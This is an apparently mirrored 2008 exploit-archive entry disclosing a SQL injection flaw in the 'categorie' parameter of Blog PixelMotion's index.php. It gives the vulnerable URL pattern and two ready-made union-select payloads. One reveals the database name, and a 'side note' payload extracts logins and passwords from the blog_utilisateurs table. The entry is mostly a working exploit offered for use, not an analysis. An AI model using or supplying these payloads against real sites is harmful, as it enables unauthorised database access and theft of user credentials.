Blog PixelMotion (index.php categorie) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Blog PixelMotion (index.php categorie) SQL Injection Vulnerability
# Published : 2008-04-06
# Author : parad0x
# Previous Title : Blog PixelMotion (modif_config.php) Remote File Upload Vulnerability
# Next Title : Site Sift Listings (id) Remote SQL Injection Vulnerability

Blog Pixel Motion Sql Injection Vulnerability
-------------------------------------------------------------------------------------------------
# Author  : parad0x
# Home   : www.inso.host.sk
# Script  : Blog PixelMotion 
# Download  : http://www.pixelmotion.org/zip/blog.zip
-------------------------------------------------------------------------------------------------
http://[target]/index.php?categorie=[SQL]

-------------------------------------------------------------------------------------------------
Example:

http://www.xxx.org/blog/index.php?categorie=-1+union+select+0,1,2,database(),4,5,6/*
-------------------------------------------------------------------------------------------------
greetz : VoLqaN
-------------------------------------------------------------------------------------------------

side note (thanks C0D3R-DZ):
http://localhost/[script_path]/index.php?categorie=-1+union+select+1,2,concat(login,0x3a,pass),4,5,6+from+blog_utilisateurs/*

# www.Syue.com [2008-04-06]